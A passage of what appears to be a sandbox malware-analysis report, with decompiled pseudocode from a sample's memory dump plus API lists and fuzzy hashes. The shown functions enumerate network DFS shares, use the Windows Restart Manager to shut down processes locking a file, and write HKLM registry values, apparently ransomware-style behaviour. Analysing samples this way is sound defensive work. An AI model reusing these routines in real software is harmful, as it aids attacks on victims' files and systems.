                          				_v8 = 0;
                          				_t121 = 0;
                          				_v1168 = 0;
                          				_v1096 = 0;
                          				_v1100 = 0;
                          				_v1132 = 0;
                          				_v1128 = 7;
                          				_v1148 = 0;
                          				_v8 = 1;
                          				if( *((intOrPtr*)(_a8 + 0x10)) == 0) {
                          					L16:
                          					asm("movups xmm1, [ebp-0x478]");
                          				} else {
                          					asm("movlpd [ebp-0x480], xmm0");
                          					_v1164 = 2;
                          					_t147 = E012F6850(__ebx,  &_v1228, _t193, _t202);
                          					if( *((intOrPtr*)(_t147 + 0x14)) >= 0x10) {
                          						_t147 =  *_t147;
                          					}
                          					__imp__#11(_t147);
                          					_v1160 = _t147;
                          					_t148 = _v1208;
                          					if(_t148 >= 0x10) {
                          						_push(_t148 + 1);
                          						_t148 = E012F56A0(_t163, _t202, _v1228);
                          						_t213 = _t213 + 8;
                          					}
                          					_v1212 = 0;
                          					_v1208 = 0xf;
                          					_v1228 = 0;
                          					__imp__#9(0x6987);
                          					_v1162 = _t148;
                          					E013478D0(_t202,  &_v1080, 0, 0x401);
                          					_t213 = _t213 + 0xc;
                          					asm("xorps xmm0, xmm0");
                          					asm("movups [ebp-0x30], xmm0");
                          					_t121 =  &_v1164;
                          					asm("movups [ebp-0x20], xmm0");
                          					__imp__getnameinfo(_t121, 0x10,  &_v1080, 0x401,  &_v52, 0x20, 8);
                          					if(_t121 != 0) {
                          						goto L16;
                          					} else {
                          						_t187 =  &_v1080;
                          						_v1188 = _t121;
                          						_v1184 = 0xf;
                          						_t199 = _t187 + 1;
                          						_v1204 = _t121;
                          						do {
                          							_t153 =  *_t187;
                          							_t187 = _t187 + 1;
                          						} while (_t153 != 0);
                          						_push(_t187 - _t199);
                          						E012F7F00(_t163,  &_v1204, _t199, _t202,  &_v1080);
                          						_v8 = 2;
                          						_t156 = E012F6730(_t163,  &_v1252,  &_v1204, _t202);
                          						if( &_v1148 == _t156) {
                          							asm("movups xmm0, [ebp-0x478]");
                          							asm("movups [ebp-0x4f0], xmm0");
                          						} else {
                          							asm("movups xmm0, [eax]");
                          							asm("movups [ebp-0x4f0], xmm0");
                          							asm("movq xmm0, [eax+0x10]");
                          							asm("movq [ebp-0x468], xmm0");
                          							 *((intOrPtr*)(_t156 + 0x10)) = 0;
                          							 *(_t156 + 0x14) = 7;
                          							 *_t156 = 0;
                          						}
                          						_t157 = _v1232;
                          						if(_t157 >= 8) {
                          							_push(2 + _t157 * 2);
                          							E012F56A0(_t163, _t202, _v1252);
                          							_t213 = _t213 + 8;
                          						}
                          						_v1236 = 0;
                          						_v1252 = 0;
                          						_t121 = _v1184;
                          						_v1232 = 7;
                          						if(_t121 >= 0x10) {
                          							_push(_t121 + 1);
                          							_t121 = E012F56A0(_t163, _t202, _v1204);
                          							_t213 = _t213 + 8;
                          						}
                          						asm("movups xmm1, [ebp-0x4f0]");
                          						_v1188 = 0;
                          						_v1184 = 0xf;
                          						_v1204 = 0;
                          					}
                          				}
                          				asm("movq xmm0, [ebp-0x468]");
                          				asm("movups [ebp-0x460], xmm1");
                          				asm("movq [ebp-0x450], xmm0");
                          				asm("movd eax, xmm1");
                          				_v8 = 3;
                          				_t165 =  >=  ? _t121 :  &_v1124;
                          				_t124 =  &_v1168;
                          				__imp__NetDfsEnum( >=  ? _t121 :  &_v1124, 0x12c, 0xffffffff, _t124,  &_v1096,  &_v1100);
                          				if(_t124 == 0) {
                          					do {
                          						_t204 = 1;
                          						if(_v1096 >= 1) {
                          							_t197 = _v1088;
                          							_t210 = _v1168 + 4;
                          							do {
                          								if(_t197 == _v1084) {
                          									_push(_t210);
                          									E012F84E0(_t163,  &_v1092, _t204, _t197);
                          									_t197 = _v1088;
                          								} else {
                          									_t142 =  *_t210;
                          									 *_t197 = 0;
                          									 *((intOrPtr*)(_t197 + 0x10)) = 0;
                          									_v1172 = _t142;
                          									_t71 = _t142 + 2; // 0x2
                          									 *((intOrPtr*)(_t197 + 0x10)) = 0;
                          									 *(_t197 + 0x14) = 7;
                          									_v1176 = _t71;
                          									do {
                          										_t184 =  *_t142;
                          										_t142 = _t142 + 2;
                          									} while (_t184 != 0);
                          									_push(_t142 - _v1176 >> 1);
                          									E012F51B0(_t163, _t197, _t204, _t210, _v1172);
                          									_t197 = _v1088 + 0x18;
                          									_v1088 = _t197;
                          								}
                          								_t204 = _t204 + 1;
                          								_t210 = _t210 + 8;
                          							} while (_t204 <= _v1096);
                          						}
                          						NetApiBufferFree(_v1168);
                          						_t140 =  >=  ? _v1124 :  &_v1124;
                          						__imp__NetDfsEnum(_t140, 3, 0xffffffff,  &_v1168,  &_v1096,  &_v1100);
                          					} while (_t140 == 0);
                          					_t202 = _v1180;
                          				}
                          				_t166 = 0;
                          				 *_t202 = _v1092;
                          				_t194 = 0;
                          				 *((intOrPtr*)(_t202 + 4)) = _v1088;
                          				 *((intOrPtr*)(_t202 + 8)) = _v1084;
                          				_t128 = _v1104;
                          				_v1092 = 0;
                          				_v1088 = 0;
                          				_v1084 = 0;
                          				if(_t128 >= 8) {
                          					_push(2 + _t128 * 2);
                          					E012F56A0(_t163, _t202, _v1124);
                          					_t194 = _v1088;
                          					_t213 = _t213 + 8;
                          					_t166 = _v1092;
                          				}
                          				_v1108 = 0;
                          				_v1104 = 7;
                          				_v1124 = 0;
                          				if(_t166 != 0) {
                          					_push(_t166);
                          					E012F5650(_t166, _t194);
                          					_push((0x2aaaaaab * (_v1084 - _v1092) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v1084 - _v1092) >> 0x20 >> 2) + ((0x2aaaaaab * (_v1084 - _v1092) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_v1084 - _v1092) >> 0x20 >> 2)) * 2 << 3);
                          					E012F56A0(_t163, _t202, _v1092);
                          				}
                          				 *[fs:0x0] = _v16;
                          				_pop(_t207);
                          				return E0132EA79(_v20 ^ _t211, _t207);
                          			}

                          APIs
                          • inet_addr.WS2_32(00000000), ref: 012F77FA
                          • htons.WS2_32(00006987), ref: 012F7841
                          • getnameinfo.WS2_32(?,00000010,?,00000401,?,00000020,00000008), ref: 012F788C
                          • NetDfsEnum.NETAPI32(?,0000012C,000000FF,00000000,00000000,00000000,39CCA9F6,?,?), ref: 012F7A07
                          • NetApiBufferFree.NETAPI32(00000000), ref: 012F7ACB
                          • NetDfsEnum.NETAPI32(?,00000003,000000FF,00000000,00000000,00000000), ref: 012F7AFF
                            • Part of subcall function 012F6850: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 012F6898
                            • Part of subcall function 012F6850: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 012F68E1
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: ByteCharEnumMultiWide$BufferFreegetnameinfohtonsinet_addr
                          • String ID:
                          • API String ID: 3609616093-0
                          • Opcode ID: 4f3998bc074f3c518fae6c65fb8adff997ac594d59314ed7755bd3632af2fe95
                          • Instruction ID: ffacb72c923d49be33a6fee166fd98f159a1d2c90fc58aebe517b73c0d5ed2da
                          • Opcode Fuzzy Hash: 4f3998bc074f3c518fae6c65fb8adff997ac594d59314ed7755bd3632af2fe95
                          • Instruction Fuzzy Hash: 37D118B1D102298AEB24CF14CC44BAEB7B4BF55304F4442E9D60DA7241EB75AB88CF59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 48%
                          			E012F8D60(void* __ebx, intOrPtr* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				intOrPtr _v20;
                          				char _v24;
                          				intOrPtr* _v28;
                          				signed int _v40;
                          				char _v80;
                          				char _v84;
                          				signed int _v88;
                          				signed int _v92;
                          				signed int _v96;
                          				char _v100;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t86;
                          				signed int _t92;
                          				signed int _t93;
                          				signed int _t97;
                          				intOrPtr _t98;
                          				signed int _t102;
                          				signed int _t104;
                          				unsigned int _t106;
                          				void* _t107;
                          				char _t111;
                          				void* _t137;
                          				intOrPtr* _t138;
                          				char _t140;
                          				signed int _t151;
                          				intOrPtr _t157;
                          				signed int _t166;
                          				unsigned int _t169;
                          				intOrPtr* _t176;
                          				signed int _t177;
                          				intOrPtr _t182;
                          				intOrPtr* _t183;
                          				void* _t184;
                          				signed int _t185;
                          				signed int _t187;
                          				void* _t188;
                          				signed int _t193;
                          				signed int _t194;
                          				void* _t195;
                          				void* _t196;
                          				void* _t202;
                          
                          				_t137 = __ebx;
                          				_push(__ebx);
                          				_t182 = _a4;
                          				_push(__edi);
                          				_t176 = __ecx;
                          				_v20 = _a16;
                          				_t166 =  *((intOrPtr*)(__ecx + 0x10));
                          				_v8 = _t166;
                          				if(0x7ffffffe - _t166 < _t182) {
                          					E012F4B30(0x7ffffffe, __eflags);
                          					goto L11;
                          				} else {
                          					_t104 = _t166 + _t182;
                          					_t169 =  *(__ecx + 0x14);
                          					_v12 = _t104;
                          					_t187 = _t104 | 0x00000007;
                          					_v16 = _t169;
                          					_t202 = _t187 - 0x7ffffffe;
                          					if(_t202 <= 0) {
                          						_t106 = _t169 >> 1;
                          						__eflags = _t169 - 0x7ffffffe - _t106;
                          						if(_t169 <= 0x7ffffffe - _t106) {
                          							_t107 = _t106 + _t169;
                          							__eflags = _t187 - _t107;
                          							_t182 =  <  ? _t107 : _t187;
                          						} else {
                          							_t182 = 0x7ffffffe;
                          						}
                          					} else {
                          						_t182 = 0x7ffffffe;
                          					}
                          					_t156 =  ~(_t202 > 0) | _t182 + 0x00000001;
                          					if(( ~(_t202 > 0) | _t182 + 0x00000001) > 0x7fffffff) {
                          						L11:
                          						E012F4A60();
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						_t193 = _t194;
                          						_t195 = _t194 - 0x5c;
                          						_t86 =  *0x13a4018; // 0x39cca9f6
                          						_v40 = _t86 ^ _t193;
                          						_push(_t182);
                          						_t183 = _v28;
                          						__eflags =  *(_t183 + 0x10);
                          						if( *(_t183 + 0x10) != 0) {
                          							_v84 = 0xffffffff;
                          							E013478D0(_t176,  &_v80, 0, 0x42);
                          							_t196 = _t195 + 0xc;
                          							_t92 =  &_v84;
                          							__imp__RmStartSession(_t92, 0,  &_v80);
                          							__eflags = _t92;
                          							if(_t92 == 0) {
                          								__eflags =  *((intOrPtr*)(_t183 + 0x14)) - 8;
                          								if( *((intOrPtr*)(_t183 + 0x14)) >= 8) {
                          									_t183 =  *_t183;
                          								}
                          								_t93 =  &_v100;
                          								_v100 = _t183;
                          								__imp__RmRegisterResources(_v84, 1, _t93, 0, 0, 0, 0);
                          								__eflags = _t93;
                          								if(_t93 == 0) {
                          									_push(_t137);
                          									_t138 = __imp__RmGetList;
                          									_push(_t176);
                          									_t177 = 0;
                          									_t185 = 0;
                          									__eflags = 0;
                          									_v96 = 0;
                          									_v88 = 0;
                          									_v92 = 0;
                          									while(1) {
                          										_t97 =  *_t138(_v84,  &_v88,  &_v96, _t185,  &_v92);
                          										__eflags = _t97;
                          										if(_t97 == 0) {
                          											break;
                          										}
                          										__eflags = _t97 - 0xea;
                          										if(_t97 == 0xea) {
                          											_t100 = _v88;
                          											_v96 = _v88;
                          											__eflags = _t185;
                          											if(__eflags != 0) {
                          												L0132ECE6(_t185);
                          												_t100 = _v96;
                          												_t196 = _t196 + 4;
                          											}
                          											_t102 = E0132ECEB(_t185, __eflags,  ~(0 | __eflags > 0x00000000) | _t100 * 0x0000029c);
                          											_t151 = _t177;
                          											_t196 = _t196 + 4;
                          											_t177 = _t177 + 1;
                          											_t185 = _t102;
                          											__eflags = _t151 - 3;
                          											if(_t151 < 3) {
                          												continue;
                          											} else {
                          												L26:
                          												__eflags = _t185;
                          												if(_t185 != 0) {
                          													L0132ECE6(_t185);
                          												}
                          												_t98 = _v84;
                          												__eflags = _t98 - 0xffffffff;
                          												if(_t98 != 0xffffffff) {
                          													__imp__RmEndSession(_t98);
                          												}
                          											}
                          										}
                          										goto L31;
                          									}
                          									__eflags = _v92;
                          									if(_v92 == 0) {
                          										__imp__RmShutdown(_v84, 0, 0);
                          									}
                          									goto L26;
                          								}
                          							}
                          						}
                          						L31:
                          						__eflags = _v12 ^ _t193;
                          						_pop(_t184);
                          						return E0132EA79(_v12 ^ _t193, _t184);
                          					} else {
                          						_t111 = E012F57D0(_t137, _t169, _t176, _t156 + _t156);
                          						_t157 = _a12;
                          						_t140 = _t111;
                          						_v8 = _v8 - _t157;
                          						 *((intOrPtr*)(_t176 + 0x10)) = _v12;
                          						 *((intOrPtr*)(_t176 + 0x14)) = _t182;
                          						_t188 = _t157 + _t157;
                          						_v24 = _t140;
                          						_v12 = _t157 + _a20 + _t157 + _a20;
                          						if(_v16 < 8) {
                          							E01345ED0(_t140, _t176, _t188);
                          							E01345ED0(_t188 + _t140, _v20, _a20 + _a20);
                          							__eflags = _v12 + _t140;
                          							E01345ED0(_v12 + _t140, _t188 + _t176, 2 + _v8 * 2);
                          							E012F5760(_t176,  &_v24);
                          							return _t176;
                          						} else {
                          							E01345ED0(_t140,  *_t176, _t157 + _t157);
                          							E01345ED0(_a12 + _a12 + _t140, _v20, _a20 + _a20);
                          							E01345ED0(_v12 + _t140, _a12 + _a12 +  *_t176, 2 + _v8 * 2);
                          							_push(2 + _v16 * 2);
                          							E012F56A0(_t140, _t176,  *_t176);
                          							 *_t176 = _t140;
                          							return _t176;
                          						}
                          					}
                          				}
                          			}

                          APIs
                          • Concurrency::cancel_current_task.LIBCPMT ref: 012F8EC1
                          • RmStartSession.RSTRTMGR(FFFFFFFF,00000000,?,?,?,?), ref: 012F8F0F
                          • RmRegisterResources.RSTRTMGR(FFFFFFFF,00000001,?,00000000,00000000,00000000,00000000,?,?,?), ref: 012F8F39
                          • RmGetList.RSTRTMGR(FFFFFFFF,?,?,00000000,?,?,?,?,?,?), ref: 012F8F70
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: Concurrency::cancel_current_taskListRegisterResourcesSessionStart
                          • String ID:
                          • API String ID: 2267271149-0
                          • Opcode ID: c3984a7bd4bcefb70691e53b99f56880885f09e4f8df7b2ad0a6d12b16fa951c
                          • Instruction ID: c96ad574894d5b9abd3b204357dfeb3f836631072f559e814455409a78c2a177
                          • Opcode Fuzzy Hash: c3984a7bd4bcefb70691e53b99f56880885f09e4f8df7b2ad0a6d12b16fa951c
                          • Instruction Fuzzy Hash: D581AF71A1021AAFDB24DFA8DC80AAEF7B9FF54314F54423DE605E7240E770AA55CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 75%
                          			E012FA2D0(void* __ebx, void* __eflags) {
                          				int _v8;
                          				char _v16;
                          				void* _v20;
                          				char _v24;
                          				signed int _v28;
                          				int _v32;
                          				short _v48;
                          				signed int _v52;
                          				int _v56;
                          				short _v72;
                          				signed int _v76;
                          				char _v96;
                          				signed int _v100;
                          				char _v120;
                          				void* __ebp;
                          				signed int _t53;
                          				short* _t57;
                          				signed int _t58;
                          				signed int _t60;
                          				short* _t62;
                          				signed int _t63;
                          				signed int _t65;
                          				void* _t81;
                          				void* _t94;
                          				short* _t96;
                          				short* _t97;
                          				signed int _t99;
                          				void* _t100;
                          				void* _t101;
                          
                          				_t103 = __eflags;
                          				_t81 = __ebx;
                          				_push(0xffffffff);
                          				_push(0x13659c5);
                          				_push( *[fs:0x0]);
                          				_t101 = _t100 - 0x68;
                          				_t53 =  *0x13a4018; // 0x39cca9f6
                          				_push(_t53 ^ _t99);
                          				 *[fs:0x0] =  &_v16;
                          				_t96 = E012F93F0( &_v96, 0x13a4e84, _t94, __eflags);
                          				_v8 = 0;
                          				_t57 = E012F93F0( &_v48, 0x13a504c, _t94, _t103);
                          				_v24 = 0;
                          				_v20 = 0x80000002;
                          				if(_t57[8] == 0 || _t96[8] == 0) {
                          					L8:
                          					_t58 = _v28;
                          					if(_t58 >= 8) {
                          						_push(2 + _t58 * 2);
                          						E012F56A0(_t81, _t94, _v48);
                          						_t101 = _t101 + 8;
                          					}
                          					_v8 = 0xffffffff;
                          					_v48 = 0;
                          					_t60 = _v76;
                          					_v32 = 0;
                          					_v28 = 7;
                          					_t110 = _t60 - 8;
                          					if(_t60 >= 8) {
                          						_push(2 + _t60 * 2);
                          						E012F56A0(_t81, _t94, _v96);
                          						_t101 = _t101 + 8;
                          					}
                          					_t97 = E012F93F0( &_v120, 0x13a50c4, _t94, _t110);
                          					_v8 = 1;
                          					_t62 = E012F93F0( &_v72, 0x13a504c, _t94, _t110);
                          					_v24 = 0;
                          					_v20 = 0x80000002;
                          					if(_t62[8] != 0 && _t97[8] != 0) {
                          						if(_t62[0xa] >= 8) {
                          							_t62 =  *_t62;
                          						}
                          						if(RegOpenKeyExW(0x80000002, _t62, 0, 0xf003f,  &_v20) == 0) {
                          							if(_t97[0xa] >= 8) {
                          								_t97 =  *_t97;
                          							}
                          							RegSetValueExW(_v20, _t97, 0, 4,  &_v24, 4);
                          							RegCloseKey(_v20);
                          						}
                          					}
                          					_t63 = _v52;
                          					if(_t63 >= 8) {
                          						_push(2 + _t63 * 2);
                          						E012F56A0(_t81, _t94, _v72);
                          						_t101 = _t101 + 8;
                          					}
                          					_v56 = 0;
                          					_v72 = 0;
                          					_t65 = _v100;
                          					_v52 = 7;
                          					if(_t65 >= 8) {
                          						_push(2 + _t65 * 2);
                          						_t65 = E012F56A0(_t81, _t94, _v120);
                          					}
                          					 *[fs:0x0] = _v16;
                          					return _t65;
                          				} else {
                          					if(_t57[0xa] >= 8) {
                          						_t57 =  *_t57;
                          					}
                          					if(RegOpenKeyExW(0x80000002, _t57, 0, 0xf003f,  &_v20) == 0) {
                          						if(_t96[0xa] >= 8) {
                          							_t96 =  *_t96;
                          						}
                          						RegSetValueExW(_v20, _t96, 0, 4,  &_v24, 4);
                          						RegCloseKey(_v20);
                          					}
                          					goto L8;
                          				}
                          			}

                          APIs
                          • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,000F003F,00000000,39CCA9F6), ref: 012FA34C
                          • RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000004,00000008,00000004), ref: 012FA36C
                          • RegCloseKey.ADVAPI32(00000000), ref: 012FA375
                          • RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,000F003F,00000000,39CCA9F6), ref: 012FA422
                          • RegSetValueExW.ADVAPI32(00000000,00000000,00000000,00000004,00000008,00000004), ref: 012FA442
                          • RegCloseKey.ADVAPI32(00000000), ref: 012FA44B
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: CloseOpenValue
                          • String ID:
                          • API String ID: 779948276-0
                          • Opcode ID: a2796f4115eeb7ede7b5a4e7c089f3ae31c8b4f40419e9ba0ef0d74f892601fd
                          • Instruction ID: a47451f6a975c45b7e2e80fd13704338ae1412b7d08549ec5e242100854a7d54
                          • Opcode Fuzzy Hash: a2796f4115eeb7ede7b5a4e7c089f3ae31c8b4f40419e9ba0ef0d74f892601fd
                          • Instruction Fuzzy Hash: 64518C70920219DFEB24DF98DC49BAEFBB8FB14314F50052DEB15A72A0D7746A08CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 76%
                          			E012FCB40(void* __edi, void* __fp0, intOrPtr* _a4) {
                          				char _v8;
                          				char _v16;
                          				signed int _v20;
                          				intOrPtr* _v24;
                          				char _v28;
                          				char _v32;
                          				intOrPtr* _v36;
                          				char _v52;
                          				char _v104;
                          				char _v148;
                          				void* __esi;
                          				signed int _t41;
                          				signed int _t42;
                          				intOrPtr* _t45;
                          				intOrPtr _t49;
                          				intOrPtr _t51;
                          				void* _t56;
                          				void* _t61;
                          				signed int _t66;
                          				signed int _t67;
                          				intOrPtr _t69;
                          				intOrPtr _t76;
                          				void* _t82;
                          				signed int _t85;
                          				intOrPtr* _t88;
                          				intOrPtr* _t89;
                          				void* _t90;
                          				signed int _t91;
                          				void* _t98;
                          				void* _t107;
                          
                          				_t107 = __fp0;
                          				_push(0xffffffff);
                          				_push(0x1365de4);
                          				_push( *[fs:0x0]);
                          				_t41 =  *0x13a4018; // 0x39cca9f6
                          				_t42 = _t41 ^ _t91;
                          				_v20 = _t42;
                          				_push(_t42);
                          				 *[fs:0x0] =  &_v16;
                          				_t88 = _a4;
                          				_v24 = _t88;
                          				E013177B6( &_v32, 0);
                          				_v8 = 0;
                          				_t85 =  *0x13aa88c; // 0xe
                          				_t45 =  *0x13ab7f8; // 0x0
                          				_v36 = _t45;
                          				if(_t85 == 0) {
                          					E013177B6( &_v28, _t85);
                          					_t98 =  *0x13aa88c - _t85; // 0xe
                          					if(_t98 == 0) {
                          						_t66 =  *0x13aa878; // 0x27
                          						_t67 = _t66 + 1;
                          						 *0x13aa878 = _t67;
                          						 *0x13aa88c = _t67;
                          					}
                          					E0131780E( &_v28);
                          					_t85 =  *0x13aa88c; // 0xe
                          				}
                          				_t10 = _t88 + 4; // 0x45c6e045
                          				_t69 =  *_t10;
                          				if(_t85 >=  *((intOrPtr*)(_t69 + 0xc))) {
                          					_t89 = 0;
                          					__eflags = 0;
                          					L8:
                          					if( *((char*)(_t69 + 0x14)) == 0) {
                          						L11:
                          						if(_t89 != 0) {
                          							L19:
                          							E0131780E( &_v32);
                          							 *[fs:0x0] = _v16;
                          							_pop(_t90);
                          							return E0132EA79(_v20 ^ _t91, _t90);
                          						}
                          						L12:
                          						_t49 = _v36;
                          						if(_t49 == 0) {
                          							_t89 = E0132EA8A(_t89, __eflags, 0x44);
                          							_v36 = _t89;
                          							_v8 = 1;
                          							_t24 = _v24 + 4; // 0x428d0824
                          							_t76 =  *_t24;
                          							__eflags = _t76;
                          							if(_t76 == 0) {
                          								_t51 = 0x13836c2;
                          							} else {
                          								_t51 =  *((intOrPtr*)(_t76 + 0x18));
                          								__eflags = _t51;
                          								if(_t51 == 0) {
                          									_t26 = _t76 + 0x1c; // 0x428d0840
                          									_t51 = _t26;
                          								}
                          							}
                          							E012F96C0(_t51);
                          							 *((intOrPtr*)(_t89 + 4)) = 0;
                          							 *_t89 = 0x137652c;
                          							E01317C11(_t85, _t89, __eflags, _t107,  &_v52);
                          							asm("movups xmm0, [eax]");
                          							asm("movups [esi+0x8], xmm0");
                          							_t56 = E01317EF8(_t82, __eflags,  &_v148);
                          							asm("movups xmm0, [eax]");
                          							asm("movups [esi+0x18], xmm0");
                          							asm("movups xmm0, [eax+0x10]");
                          							asm("movups [esi+0x28], xmm0");
                          							asm("movq xmm0, [eax+0x20]");
                          							asm("movq [esi+0x38], xmm0");
                          							 *((intOrPtr*)(_t89 + 0x40)) =  *((intOrPtr*)(_t56 + 0x28));
                          							E012F9770( &_v104);
                          							_v24 = _t89;
                          							_v8 = 2;
                          							E0131792B(__eflags, _t89);
                          							 *((intOrPtr*)( *_t89 + 4))();
                          							 *0x13ab7f8 = _t89;
                          						} else {
                          							_t89 = _t49;
                          						}
                          						goto L19;
                          					}
                          					_t61 = E01317957();
                          					if(_t85 >=  *((intOrPtr*)(_t61 + 0xc))) {
                          						goto L12;
                          					}
                          					_t89 =  *((intOrPtr*)( *((intOrPtr*)(_t61 + 8)) + _t85 * 4));
                          					goto L11;
                          				}
                          				_t89 =  *((intOrPtr*)( *((intOrPtr*)(_t69 + 8)) + _t85 * 4));
                          				if(_t89 != 0) {
                          					goto L19;
                          				}
                          				goto L8;
                          			}


                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 012FCB78
                          • std::_Lockit::_Lockit.LIBCPMT ref: 012FCB9A
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 012FCBBA
                          • __Getctype.LIBCPMT ref: 012FCC53
                          • std::_Facet_Register.LIBCPMT ref: 012FCC9D
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 012FCCB5
                          Memory Dump Source
                          • Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true
                          • Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp
                          • Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp
                          • Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp
                          • Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_12f0000_ab.jbxd
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                          • String ID:
                          • API String ID: 1102183713-0
                          • Opcode ID: bfd8304b77faafce359035334ee3330d632b573f7363171a7ee848a4891856f8
                          • Instruction ID: 8937e0132317fcd3ce3fd22b6adc736cbe0c05f93928e5d46cdbfd433609c894
                          • Opcode Fuzzy Hash: bfd8304b77faafce359035334ee3330d632b573f7363171a7ee848a4891856f8
                          • Instruction Fuzzy Hash: 0951A171D0065ACFDB25DF68C440BAAFBF8FF18314F14416DD946AB255EB30A985CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 81%
                          			E012FC9A0(void* __ebx, intOrPtr __edx, void* __edi, intOrPtr _a4) {
                          				char _v8;
                          				char _v16;
                          				signed int _v20;
                          				char _v24;
                          				char _v28;
                          				intOrPtr* _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				char _v44;
                          				char _v60;
                          				char _v112;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t45;
                          				signed int _t46;
                          				intOrPtr* _t54;
                          				intOrPtr _t58;
                          				intOrPtr* _t61;
                          				void* _t63;
                          				signed int _t68;
                          				signed int _t69;
                          				intOrPtr _t71;
                          				intOrPtr _t74;
                          				intOrPtr _t86;
                          				signed int _t89;
                          				intOrPtr _t92;
                          				intOrPtr* _t93;
                          				void* _t94;
                          				signed int _t95;
                          				void* _t96;
                          				void* _t97;
                          				void* _t98;
                          				void* _t101;
                          				void* _t110;
                          
                          				_t86 = __edx;
                          				_push(0xffffffff);
                          				_push(0x1365d8d);
                          				_push( *[fs:0x0]);
                          				_t97 = _t96 - 0x60;
                          				_t45 =  *0x13a4018; // 0x39cca9f6
                          				_t46 = _t45 ^ _t95;
                          				_v20 = _t46;
                          				_push(_t46);
                          				 *[fs:0x0] =  &_v16;
                          				_t92 = _a4;
                          				_v36 = _t92;
                          				_v24 = 0;
                          				E013177B6( &_v28, 0);
                          				_v8 = 0;
                          				_t89 =  *0x13ab800; // 0x12
                          				_t71 =  *0x13ab7fc; // 0x0
                          				if(_t89 == 0) {
                          					E013177B6( &_v24, _t89);
                          					_t101 =  *0x13ab800 - _t89; // 0x12
                          					if(_t101 == 0) {
                          						_t68 =  *0x13aa878; // 0x27
                          						_t69 = _t68 + 1;
                          						 *0x13aa878 = _t69;
                          						 *0x13ab800 = _t69;
                          					}
                          					E0131780E( &_v24);
                          					_t89 =  *0x13ab800; // 0x12
                          				}
                          				_t74 =  *((intOrPtr*)(_t92 + 4));
